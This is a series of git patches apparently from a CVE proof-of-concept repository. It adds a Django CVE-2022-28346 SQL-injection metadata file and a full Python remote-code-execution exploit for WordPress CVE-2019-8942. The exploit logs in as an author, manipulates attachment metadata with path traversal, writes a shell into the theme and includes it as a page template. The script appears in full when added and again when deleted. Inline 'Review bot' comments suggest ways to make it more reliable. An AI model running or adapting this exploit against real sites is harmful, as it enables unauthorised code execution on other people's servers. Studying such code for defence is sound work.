zgdCUR5u{>llZ|Tp!-U3S2 z%p7k^PleJYKd3&k(N0SCi@y78z}8jHnx$|eiScnsNEjc@IjkT|?K`kW_Ow|HTRr= zR&*wa{zVnvw6?%>JN#i9JP}IW_JgTdn2}33B01=oSl4FIBv-7C+ekGBFQjP^|FMzU|uSW}(M9WhiLwWak zvsr$Ndqs6t2hW3L^W#C)51Mli_kETw#LV=Cw!aeT7ys1j2?t_DcEjRc9H#6Z3c%@ax{2+2TSd zm7eQ0>DgWST{yJdpHKwzd>egO7wd4)rqYs`30#D_G}x)gVQ48mt4cLZ@tMC@yUQiQ z`Ojxwmn#Z(#i?I^4STt>HDhI@Oi=QvCUy0Mfb@r2&&$Cl<}2#c{26Dwzm%=mn0~TV z3x_fchAVn6N%j5gJw5)j{VtF41M#ylz8=N;E53uF*Vz*$kK_(^jxPBS-gHf?Q}%_b ze+#W%joQiKKi3C4u?OWnByC)nHwPK%BK^)8tsbSoA12d% z<4AO@(1LG=f7$t0ax@Bdod#O01lxcYg3(fggr{86{}|KuPk@NgzlyfOyQ(r>VYiw` z#ANzM`u|y);CXa*>sO@}7~cIKS|Gg^#WQu>v;sW>KsR375;~5oRvi=q9N;kRSi-LY1*7yNx0mPo7iVj0C}MeTlKx~C`)@#<0Ev;cCTH|_hB+lIS?S0SZlOIi}8r+$KX$tkWvE7DI{wm)h(|K>)wW!X~W3_OY2< z%}+64YvR#pGPeTdrYZ&*yBv|VH?pW`Ny|guM8H~z4&dEyyo$dlu^F+<6ru%lr3vH) zA0x5j&teR4HoJ<8H4*0*B=k@)pX@&&GY#)Vb$1J7+r4D_47Al<1lP)A{ 
zIoux|w6vBW&=lv^DlBR9098wYo(7R%Tv!{M8Y{x8PG^2UJ*n8x zi-?y`3K+9Y_uUc^b_ZI7-=;~qf25{8mexV~#4JJGCMeHSoAbUdEy>Q{k&n41Xz<~{ zj>M3-|3^e~YwcZ)w2W04~tdFO0Vk4`oezMpz-I4|b3ljrbp%v{TW(Ns21yRTqmUDc}TK{Jfv>}rrFVUDV0P;xMX zD4tp@fWl=sJt6|r={sKxeta~bZOSPJG9t+SPdJ=I{~FzN9+ zJk9n~6I16&;otInXJJKJbpL!I_B1(yPg0WFLWQBQFFSUAcI^dPcQ38nin7R~ z`ircHx?dfFBkA6(kX`#r-J28&izITKzKrS08j>O%9d7qI1!U@`%~=|21*Qe&xEWO_ z?7b4^xK0?WqDSIk2W#9@d6wKMA!*dWjc35*n46v4|9 zwh)v|rUA({Nn^jqP}l=6pOd9JadM`jrRdi;ZkB6`&;z367RqFAUU!H9+$n z(buq+(02tHfmM`l%Kxa{jB1?5(bX@jhXMG{3OKy=`?4}w(@xLFPLO|Lls#M-#6GA2 zI>zt7z zk9sD`Bp$?<)aP5o6$V`V3+?->{wnL|XUU4UD*Q&2)C#&BaNaVrFQN%CHtEl}ATDYB zQX?vfeO2;F?fk_G$Yrjm8fZ=W`M8YkpVpnoRenlXwd|4GrJ9#P6~-Wy6Pjc@^0`kx z)=xjv_Q(RG_T?e1+o)}qZ`y6h2+z`N^rY#OVu@+Fqq>|}B zup=R38C^O#fvw~|x(ZW_=>Tw@w;bJ5b%^=!#qf9SAA9=I^*sIVZkA&nFAVRhX@mEa zFBSD%EyJLl5e>Fe)vW$70VCV2+5d^kY|gC%N#B>p`smxB#xSN3aqE$HkUH}8p`d?A_D zW0pe3P+jzQsJ00}{YjW-<=UtUNwEL5qn*<@jR>%--vWc%9Nc5?AuGx>>QQ|@#nHE3 z=yL&<4F=dq#g;jiRgf8^%81)aEv*%q1_f$&xidP`JoWia0(W;^Dzqt>Ui9g2_T2ai z%rWT^bZtH)(G#2s77qyn6{;&=ma#cr7IB`s^eeG1pa>dk?K)!iGdx%O-s^O_F7Mlv z^~7)E>p5M%`NOBf?Q&=i8Lc73{;bIcv!?NnFB1A5z@VM1lA@DKSH`cAPq*H}YV9_+ z>nV?Qlv=&TQ9zs_DD`JW@ru^H96^`D;Geu8-D=u?CrtCh&zxOKN%s;J6NXwZhpr|3 zPwSlo&yCoOtK-!{`^bku8_k2f8O8A~7@`JLcivfSt@@O%*0^GFJ%X37_uAw?dA6#;6=0 z!df>s! 
z@kR%3J4fCn6$PW?g*XDoPqS*V8Byw84m`+b5X($&kYjG#64)e zw}BnVs&R4FW#8;SPFU6>G)G*&5o1yG+Fw$Q3p-WxEtjc%Y6vtH*>`YVaK%)3<}OlX z{3Mi=FN?9ADt@@FJ$OJwP*zl5J=XCbeV|jPRq}*-%rR{7ru`Vm5-`jQZ z3hws$L(sYxpdGE*%!ufT?P)4dk+#v;!i|pS?B#UM2%@JEwF`yHwO2a#hP7XA3O<*uid=I@2y=8+lSH$3*HV zdMP29&w>ogo*3i;IuR%150j|5Q}^ZL8B!S1PQTrGz9OR%1UDZ#9zZCwBXxOq-#^a7Vav>uFtmE0U+;-pT3(ZyM0;jwNeHgUG z{pA3@n-}7q?`5^gi1&ev@9quie&4eeybN=5x?$txYG$X^c5$aWI5^bZ?`5Ra;WC!Mp0r+aam*~ZmdhwuX~=G(izO}`uSPCv;N}sYPutq<;&*o=FmE?sWREm<9#?6A$D+Ihi9xz#G$Pq(XOM`js_H~7lbGp z(DwJP`GlQQR6i+T8KqcjvG{F1H1A@W`E5PE5v4yGfH`F|nM9Mrl1csrZ3rKQ_<2#; z*O4^$Ed9XF{=Ku;MVHY5F72-{9c(psyb3us^xd{YW4bQpB&?&|RIh()3192%%s{+` zSdw8xhF2lU8!D|`Sxtmoe<%+&+h^*hG6FuV3)~TY$_nXer0uALHs8CM)Rt>-k$7y- z==gDp6@0yAH$6Qb zeaDr`URkr%9dlpz{0%-_oS0TfRdi6NJ9`Vtr5>rVvCur%@U+hFP`4ghgwlwA`q3Xn zmn`WnOq&|pX0hMLH^OByxi@6dk^JF{k-YWDvh3U@Eq@}HHr|r3@2;y0k9Wm7TUCXl zA8X&5N(s=DfKw;4?DegDW^`BYT^}8FX<2EEu&0YjAhM?}lN~}nirJ%=aU8&IN75+M zz%&2FYkGUp>nGJ@)Ry+wF1}vT$B8#+*{YMP-S~6GAo3M-v9R}5J zlb&>mpMj$D-8KjuK`uQym{_!}87p1%|n`n~r{ z?D(F6i-`4xu%2rscG#)SD!}1&gQinPg4I& z9hzndF2lc*H#%OAp%D5=td*AR5=37f7ihEnJkte*`{1UdCLKhP=lV7WYm_=XzMgC< z7e}<&c_SQ>|LQEE6=`q56XG%;tt$3BmX{148P6Ul8&6gSpGkcmBh@-0>FPCvCkRUjRH&(gI`5_!KhGWM%pOD@bqxh!9XsWJ$Tl~6#(2=6b7 zw_M%^i!pm}?3{t@30MAg%n~u`d{RCo3K8mNb6844v&JD{G#8d{qIh(!RP@22&u6eU zjD_CmYRl6iWLnhTAZoHq3PCwTN?Uro;R7F<56bgM2&_GJ+8Bn$kTcL$Kcv5^ko9z3 zCM5H-Z1J6c1CLp#FjPA~WP)td9hV_OZ@>>M-p?zMEoSUbzM zX(wizhs%>IM{4?*@eL}hU7S=qNc)fnx+s?OQb6b6b(b>hwFRdp@_S&6FF1ZTh@D(WJMZ z{QrN!Y8poK%#{1}%_5`m`3?HqFC&`iZ#fk5C>nG*MRow`asc5!a=IqhGx;|z^1l`QnCtNeFIv;@j=p>V5XHs(kTa35v*xUWeoRUW|=%I~g9!T)n##LBV@e+mifi z@tW7`QV5sS&NHE0E&|oBJXS((45Hzh3xTW#cmY8NL*zr)iHD+;YVv|)I`k5BjP0e1 zz^{{BEyPP7A?NKMoVrrfKH2@?+|#T;%|hEMlLDMJP$ZaBHTj7rxc^AN6eO+i+H6uj z3E7VNR8;|iqeh~A=Dt{UkcrG%DXGN+lkA0CF6QvHPjA(=P}N$;1ZdzU_QmZQ>WV$li$5EO z!Wr1A7<6gLe{6>DCE@6_gm+)L?{sy?QCjF0? 
z8-ci3L(q**9^!D)7UTKA5LjB=USWf_l{DD)&O%g59VCEN6WqDYn$>m#D9t6?(h2SI zSj(FVJcVA68jPQ77pfN(LjJMc@94B`*!2GzYT1+6b{S7Td@?=}6itrC2N-xUF8FTH z>m4*yaW@d-^lj=vY1yX4qfW8#iB*;`VHLphN#*_c=y&z3u*EPKSw>)CPgZz?m(5R~ z{|ak~x5@6`oU5eL_fdDNj$+v8f(4x^?|tmDY)?Kk8OcS=uigtgG@(_e*>7gt;i0nd z_2nE&7yX)}lrHeh)N>haMpDX(wT~4ZMhuL7|S_~ia5GNzfPq7L! z8*25MYQx?7xCMbx*shSOG1?EjJVK-9bka$_JV5?5qyF*!Y?{5dn#f(9mz{; zER!nb6y)etDJ<1pgoul(3^sr-tUX;yi$8(~tzX3Y@}hFKm@f{9TVubhWx?u%MMq}L zB%zEJgM#Pp>GJ&y#mn9C0t|K+^nV&N%h7w#a^3(JJ7-k=AF{&N9^bwKfR||kq{T87 z{~2ztRir`EQNhMvb96I5+UMxB^YDX3`%}PiH{mMvOQBgL&I?-Bevq$m8sr$#Vfy!m zfyHZjgYicbs@GkDje0oa8C?)UNt|*uq+c+sr(geQrpsk5xH}3l`ifPrUdg_eRh)@h z2@8X)eP#Xnxi{qulHy#*mLBP_9-U&AT)o7Tzo3-7)4D&bwJM&WYvF80$ zW&cj8Jl%PB>`Q-blub&4N*;oiwU-1rx9tRyY@!YA>s#3a7umN}166BHCq{0>G}jb$0SDx>}(dEnYPCzImWe$Vq2) zSsD+09+E{b9pE?O0^_sYnPk82Z%<&WDPc*BJ&ReQ?-*g>#05j$yE6sG(##X5qO3j) z*NqMwt@CYHhudRth*=YQ?)19gK!=LO>mtpC+hT}*Amx~ee%xEse)b*?hvy>9p<6Si zs7$aZ8nGGzz;-0F;LLk2RU#ZwDJ};&CNGyh*!a{`HJd3sf!sO;g;RBw8z4kQg@-Rs z4azCBl?C!PsLBvYzdBWJd);>bsFQ8Yq$&5ObCU1+?CTjmcv}?fsyubE7fjz{s45ZH zGUYWjyztEavNs`qPN^YfdETuc9cH^?6~{;2G=tigFZ&s<_;=>ge`wm|7ixuhUNlf_ z4U)J^V+%^Gas1Vyy4L&GLDo8>;(TYjc&=fY^PBvgQs|38 zjMpJyZW>or2OQ2<(a;}UP*kO__k7jS>6>x*>8`OC7Ln+yMVR+G03OfUtEZ-@=m^t$ zPV;+BRwkKwZ1<+m7Bj`@)7dAv^stnY>8yoepl$+ruURa1Z@~m6jX`W~J^oNU51=Zs zG0xp&4szXB+I;U*aucij@o&n-#0MyTO`0ZiOomto{2as2eo+uVF}v5jC45e4V%r-z zjDCu9&>Eq^9dl8jcWS5So1F64p`EbohG0GUzHL3BhdAC+Ak~n|&ClY4y~ufQbUwLW ztV2De<1oXpx*Ezi-yi~d9bmw}z)u1aSWH+xSCyDK_dNe!K?*fh_5UNJK+>~aRfloc z?;FeZT8MSL(LnZG93l?)3*$$0G`!y;awDDk5p)%M9yi~hW#({U9Ksm;ce-g+0iHXP zHCneI^ixo`+(YCOUajrFGvp)~pMHaJ!FUY-1o4KSXLLzKhK$E_#>uBbix0jN&sNg>O}JN( z&cnCNUy*up)t$})|Bnf1w(!yD%oyNG-+S-Cj`5qQsxoiWrIpPK9?q5}LC7pgHb1FQ z%S6l~+F9V~;%p#cH68j0ds!qHY#b|b8zubB)|v)ue_hiZOtKfhS<0wCRzaVSvmVI% zEU9TZs{zdayw@Lb$24Dbr~z6-Sf6goczQAKUx(2MpU$qHYGNMDR$|Do{O+Bj9kk%4ne)p8|j^BCqR5DxlVXI<^ATz&(L1?jfWPGeIMs1`?Zlw_JAKYx_ 
zA$1F=Lti~OGn+eY)-|e?;}VEgB;g-sS_sVp$hf&=Ou9@9TgJV=j>ZFP_VMY(*0h3cJBrhq!CZCMGkOt-tOo^cIoh%G7lt%#>o2OMUHLy`iLm(V8-()n8yT5xsi4iih7qi$*=hMG`Ta2y*#c}QS7dtlTZ%Pm(mCVLH zw&Yp}x00K2(2rrUArK52=SmN&czJ~cMh(yZp3*w621JBZfkO@_7sWRo4%pyxqooI2 zSeI6Y=Yyyxh_Q*0t=^7GE6Xu0E`2QJg2}y+Xfu!x6{ff<%6Y?^9pajE%EA4;iDASx{RN(nn)&f8-cYzkSr@J~BWLRMWl%sqlNxBcL{0N*iwe17=6mDe}#nP@!hi zW>=xCbG6rI#vtd#dG9>*s2PjHV$-S#$xD{AZ>p%8fuA4dr#78oCM4qELv0X;bH0c4 zlGox5o!FGO6BrWfx9QXJqvvRV|K1z|rV}&Uyz=34#Z8SD!5PiK)}wxcWs+0=J!`59 zCz{#ZbL2kV;Yy9_zZJgs7_z;&Pk*aH1s^y0~dK(F_}e>m>;B(BcXoioMI z!W|5>^(Z!}ZaXPgdQ&Qpt%H%8x_m3^vA%c4`C@IlP?zH+BL3$RADmzT-WT@&bspb! zX}19WcN*{Bk8g|3@ay*jH=Mv8(ufk-`W=#ZydJw~O3uzoAc&OpzWQr(j`lGU*6hTF zQ=R@%>X@rO2Cb90Q3Di9l;ovoiM|)^m_1Hdj+qQ|fWZl*g#liNl%aWBxMewjZlkOs)a^44g!+q*a>)*&Jwt z4oy;vhCUeSC;Vp^J29&KgwOx}kqPpHcccC@hAC{Kii?BIQmdWQy)L)^v-Hg$O%rQc zqs}1zAfs#}0tR)~CitQF?`#OLtu#&fneI{fOu51Bfdl$u%=qu*KKQ=ItA9Ds;P0ZL z?f=FA3Qhi}3$$l$1Vl4*Pq+?lVS!3$8;wsTkZ+fZYaXWkq_W)p_FjM`$^Tb_KnKmg n@B4opsPKOo2J-*Kb}vB=B%0Ip>taSY*w1@e6`3+=!>|7hzzG7; literal 0 HcmV?d00001 diff --git a/cve/django/2022/yaml/CVE-2022-28346.yaml b/cve/django/2022/yaml/CVE-2022-28346.yaml new file mode 100644 index 00000000..739255ff --- /dev/null +++ b/cve/django/2022/yaml/CVE-2022-28346.yaml 
@@ -0,0 +1,22 @@ +id: CVE-2022-28346 +source: + https://github.com/DeEpinGh0st/CVE-2022-28346 +info: + name: Django 是一个高级的 Python 网络框架,可以快速开发安全和可维护的网站。由经验丰富的开发者构建,Django 负责处理网站开发中麻烦的部分,因此你可以专注于编写应用程序,而无需重新开发。 它是免费和开源的,有活跃繁荣的社区,丰富的文档,以及很多免费和付费的解决方案。 + severity: critical + description: | + Django部分版本存在QuerySet.annotate()、aggregate() 和 extra() 方法可通过精心制作的字典(带有字典扩展)作为传递的 **kwargs 在列别名中进行 SQL 注入。 + scope-of-influence: + Django 2.2.x - 2.2.28 + Django 3.2.x - 3.2.13 + Django 4.0.x - 4.0.4 + reference: + - https://nvd.nist.gov/vuln/detail/CVE-2022-28346 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.8 + cve-id: CVE-2022-28346 + cwe-id: CWE-89 + cnvd-id: None + kve-id: None + tags: Django, SQL injection \ No newline at end of file From d65b1558dc58e25881f5fa06b477e2d0daad353e Mon Sep 17 00:00:00 2001 From: zeroc Date: Fri, 7 Apr 2023 17:22:05 +0800 Subject: [PATCH 013/109] =?UTF-8?q?=E6=9B=B4=E6=96=B0openkylin=5Flist.yaml?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- openkylin_list.yaml | 2 ++ 1 file changed, 2 insertions(+) diff --git a/openkylin_list.yaml b/openkylin_list.yaml index 7128c8a6..ce103e6a 100644 --- a/openkylin_list.yaml +++ b/openkylin_list.yaml @@ -145,6 +145,8 @@ cve: - CVE-2021-3517 - CVE-2021-3518 - CVE-2021-3537 + django: + - CVE-2022-28346 fortinac: - CVE-2022-39952 redis: From 3053435b624d3409d33ca19d5b865f3410b51060 Mon Sep 17 00:00:00 2001 From: bbj Date: Fri, 7 Apr 2023 12:22:42 +0000 Subject: [PATCH 014/109] =?UTF-8?q?=E6=96=B0=E5=BB=BA=20WordPress?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- cve/WordPress/.keep | 0 1 file changed, 0 insertions(+), 0 deletions(-) create mode 100644 cve/WordPress/.keep diff --git a/cve/WordPress/.keep b/cve/WordPress/.keep new file mode 100644 index 00000000..e69de29b From cb3db2a94b57e7e65834abfbe76a97711fa09d5b Mon Sep 17 00:00:00 2001 
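Review bot: `scope-of-influence` is written as bare continuation lines rather than a list, so YAML either folds the three version ranges into one plain scalar (if they are indented past the key, as the collapsed text suggests) or fails to parse; since `reference:` uses `- ` items, write it the same way: `scope-of-influence:` / `  - Django 2.2.x - 2.2.28` / `  - Django 3.2.x - 3.2.13` (and the 4.0 line likewise). `cnvd-id: None` and `kve-id: None` parse as the string "None", not as a null; use `null` (or `~`) if the field is meant to be absent, or drop the keys. `info.name` holds a general description of the Django framework while the actual issue appears only under `description`; a consumer rendering `name` as a title would show the framework blurb, so a short title naming the affected `annotate()`/`aggregate()`/`extra()` column-alias injection would fit better. The only entry in `reference` is the NVD page; if the catalog expects the vendor advisory as well, it should be added alongside rather than relying on the third-party repository in `source`.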
From: bbj Date: Fri, 7 Apr 2023 12:25:00 +0000 Subject: [PATCH 015/109] add cve/WordPress/poc.py. Signed-off-by: bbj --- cve/WordPress/poc.py | 97 ++++++++++++++++++++++++++++++++++++++++++++ 1 file changed, 97 insertions(+) create mode 100644 cve/WordPress/poc.py diff --git a/cve/WordPress/poc.py b/cve/WordPress/poc.py new file mode 100644 index 00000000..853e4d08 --- /dev/null +++ b/cve/WordPress/poc.py 
@@ -0,0 +1,97 @@ +#!/usr/bin/python3 + +###################### +## Imagick RCE POC ## +###################### +import requests +import re + +url_root = 'http://localhost/' +theme = 'twentyseventeen' +current_date = '2019/03/' +filename = "imagick.jpg" + +session = requests.Session() +creds={'log':'author','pwd':'author','wp-submit':'Log In','redirect_to':'{url}wp-admin/'.format(url=url_root),'testcookie':1} +tmp={'wordpress_test_cookie':'WP Cookie check'} +r=session.post(url_root+'wp-login.php',cookies=tmp,data=creds) +wp_init_cookies=session.cookies + +#get nonce +response = requests.get('{url}wp-admin/media-new.php'.format(url=url_root),cookies=wp_init_cookies) +_wp_nonce = re.findall(r'name="_wpnonce" value="(\w+)"',response.text)[0] + + +#uploading image +data = { + 'post_id': '0', + '_wp_http_referer': '/wp-admin/media-new.php', + '_wpnonce': _wp_nonce, + 'action': 'upload_attachement', + 'html-upload': 'Upload' +} +evil = {'async-upload':(filename, open(filename, 'rb'))} +upload_result = session.post(url_root+'wp-admin/async-upload.php', data=data, files=evil, cookies=wp_init_cookies) +image_id=upload_result.text +print(f'Image ID: {image_id}') + +#First exploit :changing metadata +#Part 1 create folder ==> evil.jpg?/x +response=requests.get(url_root+'wp-admin/post.php?post='+image_id+'&action=edit',cookies=wp_init_cookies) +_wpnonce=re.findall(r'name="_wpnonce" value="(\w+)"',response.text)[0] +ajax_nonce = re.findall(r'imageEdit\.open\( \w+, "(\w+)"',response.text)[0] +print(ajax_nonce) +data={'_wpnonce':_wpnonce, +'action':'editpost', +'post_ID':image_id, +'meta_input[_wp_attached_file]':current_date+filename+'?/x' +} +response=requests.post(url_root+'wp-admin/post.php',data=data, cookies=wp_init_cookies) + +#Creating file with wrop-image +data={'action':'crop-image', +'_ajax_nonce':ajax_nonce, +'id':image_id, +'cropDetails[x1]':0, +'cropDetails[y1]':0, +'cropDetails[width]':400, +'cropDetails[height]':300, +'cropDetails[dst_width]':10, 
+'cropDetails[dst_height]':10} +response=requests.post(url_root+'wp-admin/admin-ajax.php',data=data, cookies=wp_init_cookies) + +#Part 2 creating file into current theme +data={'_wpnonce':_wpnonce, +'action':'editpost', +'post_ID':image_id, +'meta_input[_wp_attached_file]':current_date+filename+'?/../../../../themes/'+theme+'/shell' +} +response=requests.post(url_root+'wp-admin/post.php',data=data, cookies=wp_init_cookies) +data={'action':'crop-image', +'_ajax_nonce':ajax_nonce, +'id':image_id, +'cropDetails[x1]':0, +'cropDetails[y1]':0, +'cropDetails[width]':400, +'cropDetails[height]':300, +'cropDetails[dst_width]':10, +'cropDetails[dst_height]':10} +response=requests.post(url_root+'wp-admin/admin-ajax.php',data=data, cookies=wp_init_cookies) +print(response.text) + +#Including into theme +response=requests.post(url_root+'wp-admin/post-new.php', cookies=wp_init_cookies) +_wpnonce=re.findall(r'name="_wpnonce" value="(\w+)"',response.text)[0] +post_id=re.findall(r'"post":{"id":(\w+),',response.text)[0] +print(f'Post ID: {post_id}') + +data={'_wpnonce':_wpnonce, +'action':'editpost', +'post_ID':post_id, +'post_title':'wut', +'post_name':'wut', +'meta_input[_wp_page_template]':'cropped-shell.jpg' +} +response=requests.post(url_root+'wp-admin/post.php',data=data, cookies=wp_init_cookies) + +print(f'Rce at {url_root}?p={post_id}') \ No newline at end of file From 3fbd25e944e26ac18e14b3e154802a7aa27c3cb7 Mon Sep 17 00:00:00 2001 From: bbj Date: Fri, 7 Apr 2023 12:25:10 +0000 Subject: [PATCH 016/109] =?UTF-8?q?=E5=88=A0=E9=99=A4=E6=96=87=E4=BB=B6=20?= =?UTF-8?q?cve/WordPress/.keep?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- cve/WordPress/.keep | 0 1 file changed, 0 insertions(+), 0 deletions(-) delete mode 100644 cve/WordPress/.keep diff --git a/cve/WordPress/.keep b/cve/WordPress/.keep deleted file mode 100644 index e69de29b..00000000 From 24f8fb5990bdba4afd59515f252d32a48a13c78d Mon Sep 17 00:00:00 2001 
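Review bot: The login response `r` is never checked, so when authentication fails every later `re.findall(...)[0]` dies with a bare IndexError far from the cause; replace the first lookup with `m = re.search(r'name="_wpnonce" value="(\w+)"', response.text)` / `if m is None: raise SystemExit('no _wpnonce in media-new.php: login probably failed')` / `_wp_nonce = m.group(1)` and guard the other three `[0]` indexings the same way. The `open(filename, 'rb')` inside the `evil` dict is never closed; wrap the `session.post(... files=evil ...)` call in `with open(filename, 'rb') as fh:` and pass `fh` instead. The script also mixes module-level `requests.get`/`requests.post` with `session`, which only works because `cookies=wp_init_cookies` is passed by hand on every call; using `session` throughout would make the cookie handling implicit and drop the duplicated argument. The header comment says only "Imagick RCE POC"; it should carry the identifier the directory gives the file, CVE-2019-8942, and state what the code assumes — an account matching `creds`, an `imagick.jpg` next to the script, the upload month hard-coded in `current_date`, and that it creates a post and writes into the active theme on the target. The identical file is re-added unchanged in PATCH 022 at cve/WordPress/2019/CVE-2019-8942/poc.py, where all of the above applies as well.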
From: bbj Date: Fri, 7 Apr 2023 12:26:09 +0000 Subject: [PATCH 017/109] =?UTF-8?q?=E6=96=B0=E5=BB=BA=20CVE-2019-8942?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- cve/WordPress/CVE-2019-8942/.keep | 0 1 file changed, 0 insertions(+), 0 deletions(-) create mode 100644 cve/WordPress/CVE-2019-8942/.keep diff --git a/cve/WordPress/CVE-2019-8942/.keep b/cve/WordPress/CVE-2019-8942/.keep new file mode 100644 index 00000000..e69de29b From 23539481916e494048d233ad222f0be1f68060e1 Mon Sep 17 00:00:00 2001 From: bbj Date: Fri, 7 Apr 2023 12:26:28 +0000 Subject: [PATCH 018/109] =?UTF-8?q?=E6=96=B0=E5=BB=BA=202019?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- cve/WordPress/2019/.keep | 0 1 file changed, 0 insertions(+), 0 deletions(-) create mode 100644 cve/WordPress/2019/.keep diff --git a/cve/WordPress/2019/.keep b/cve/WordPress/2019/.keep new file mode 100644 index 00000000..e69de29b From 8a417244cf61f49eb26a8c6c0cbfef68cc7ccf0e Mon Sep 17 00:00:00 2001 From: bbj Date: Fri, 7 Apr 2023 12:26:37 +0000 Subject: [PATCH 019/109] =?UTF-8?q?=E5=88=A0=E9=99=A4=E6=96=87=E4=BB=B6=20?= =?UTF-8?q?cve/WordPress/poc.py?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- cve/WordPress/poc.py | 97 -------------------------------------------- 1 file changed, 97 deletions(-) delete mode 100644 cve/WordPress/poc.py diff --git a/cve/WordPress/poc.py b/cve/WordPress/poc.py deleted file mode 100644 index 853e4d08..00000000 --- a/cve/WordPress/poc.py +++ /dev/null 
@@ -1,97 +0,0 @@ -#!/usr/bin/python3 - -###################### -## Imagick RCE POC ## -###################### -import requests -import re - -url_root = 'http://localhost/' -theme = 'twentyseventeen' -current_date = '2019/03/' -filename = "imagick.jpg" - -session = requests.Session() -creds={'log':'author','pwd':'author','wp-submit':'Log In','redirect_to':'{url}wp-admin/'.format(url=url_root),'testcookie':1} -tmp={'wordpress_test_cookie':'WP Cookie check'} -r=session.post(url_root+'wp-login.php',cookies=tmp,data=creds) -wp_init_cookies=session.cookies - -#get nonce -response = requests.get('{url}wp-admin/media-new.php'.format(url=url_root),cookies=wp_init_cookies) -_wp_nonce = re.findall(r'name="_wpnonce" value="(\w+)"',response.text)[0] - - -#uploading image -data = { - 'post_id': '0', - '_wp_http_referer': '/wp-admin/media-new.php', - '_wpnonce': _wp_nonce, - 'action': 'upload_attachement', - 'html-upload': 'Upload' -} -evil = {'async-upload':(filename, open(filename, 'rb'))} -upload_result = session.post(url_root+'wp-admin/async-upload.php', data=data, files=evil, cookies=wp_init_cookies) -image_id=upload_result.text -print(f'Image ID: {image_id}') - -#First exploit :changing metadata -#Part 1 create folder ==> evil.jpg?/x -response=requests.get(url_root+'wp-admin/post.php?post='+image_id+'&action=edit',cookies=wp_init_cookies) -_wpnonce=re.findall(r'name="_wpnonce" value="(\w+)"',response.text)[0] -ajax_nonce = re.findall(r'imageEdit\.open\( \w+, "(\w+)"',response.text)[0] -print(ajax_nonce) -data={'_wpnonce':_wpnonce, -'action':'editpost', -'post_ID':image_id, -'meta_input[_wp_attached_file]':current_date+filename+'?/x' -} -response=requests.post(url_root+'wp-admin/post.php',data=data, cookies=wp_init_cookies) - -#Creating file with wrop-image -data={'action':'crop-image', -'_ajax_nonce':ajax_nonce, -'id':image_id, -'cropDetails[x1]':0, -'cropDetails[y1]':0, -'cropDetails[width]':400, -'cropDetails[height]':300, -'cropDetails[dst_width]':10, 
-'cropDetails[dst_height]':10} -response=requests.post(url_root+'wp-admin/admin-ajax.php',data=data, cookies=wp_init_cookies) - -#Part 2 creating file into current theme -data={'_wpnonce':_wpnonce, -'action':'editpost', -'post_ID':image_id, -'meta_input[_wp_attached_file]':current_date+filename+'?/../../../../themes/'+theme+'/shell' -} -response=requests.post(url_root+'wp-admin/post.php',data=data, cookies=wp_init_cookies) -data={'action':'crop-image', -'_ajax_nonce':ajax_nonce, -'id':image_id, -'cropDetails[x1]':0, -'cropDetails[y1]':0, -'cropDetails[width]':400, -'cropDetails[height]':300, -'cropDetails[dst_width]':10, -'cropDetails[dst_height]':10} -response=requests.post(url_root+'wp-admin/admin-ajax.php',data=data, cookies=wp_init_cookies) -print(response.text) - -#Including into theme -response=requests.post(url_root+'wp-admin/post-new.php', cookies=wp_init_cookies) -_wpnonce=re.findall(r'name="_wpnonce" value="(\w+)"',response.text)[0] -post_id=re.findall(r'"post":{"id":(\w+),',response.text)[0] -print(f'Post ID: {post_id}') - -data={'_wpnonce':_wpnonce, -'action':'editpost', -'post_ID':post_id, -'post_title':'wut', -'post_name':'wut', -'meta_input[_wp_page_template]':'cropped-shell.jpg' -} -response=requests.post(url_root+'wp-admin/post.php',data=data, cookies=wp_init_cookies) - -print(f'Rce at {url_root}?p={post_id}') \ No newline at end of file From 5ed955d265cef92cdccbe32bee1f6bb28c7e411d Mon Sep 17 00:00:00 2001 From: bbj Date: Fri, 7 Apr 2023 12:26:42 +0000 Subject: [PATCH 020/109] =?UTF-8?q?=E5=88=A0=E9=99=A4=E6=96=87=E4=BB=B6=20?= =?UTF-8?q?cve/WordPress/CVE-2019-8942?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- cve/WordPress/CVE-2019-8942/.keep | 0 1 file changed, 0 insertions(+), 0 deletions(-) delete mode 100644 cve/WordPress/CVE-2019-8942/.keep diff --git a/cve/WordPress/CVE-2019-8942/.keep b/cve/WordPress/CVE-2019-8942/.keep deleted file mode 100644 index e69de29b..00000000 
From ae68072e3f15ff9597712d594ec4a245a3ea6a20 Mon Sep 17 00:00:00 2001 From: bbj Date: Fri, 7 Apr 2023 12:27:04 +0000 Subject: [PATCH 021/109] =?UTF-8?q?=E6=96=B0=E5=BB=BA=20CVE-2019-8942?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- cve/WordPress/2019/CVE-2019-8942/.keep | 0 1 file changed, 0 insertions(+), 0 deletions(-) create mode 100644 cve/WordPress/2019/CVE-2019-8942/.keep diff --git a/cve/WordPress/2019/CVE-2019-8942/.keep b/cve/WordPress/2019/CVE-2019-8942/.keep new file mode 100644 index 00000000..e69de29b From 3bea185e6d42faa22c5f0b1ea50b201c650d5d2a Mon Sep 17 00:00:00 2001 From: bbj Date: Fri, 7 Apr 2023 12:27:22 +0000 Subject: [PATCH 022/109] add cve/WordPress/2019/CVE-2019-8942/poc.py. Signed-off-by: bbj --- cve/WordPress/2019/CVE-2019-8942/poc.py | 97 +++++++++++++++++++++++++ 1 file changed, 97 insertions(+) create mode 100644 cve/WordPress/2019/CVE-2019-8942/poc.py diff --git a/cve/WordPress/2019/CVE-2019-8942/poc.py b/cve/WordPress/2019/CVE-2019-8942/poc.py new file mode 100644 index 00000000..853e4d08 --- /dev/null +++ b/cve/WordPress/2019/CVE-2019-8942/poc.py 
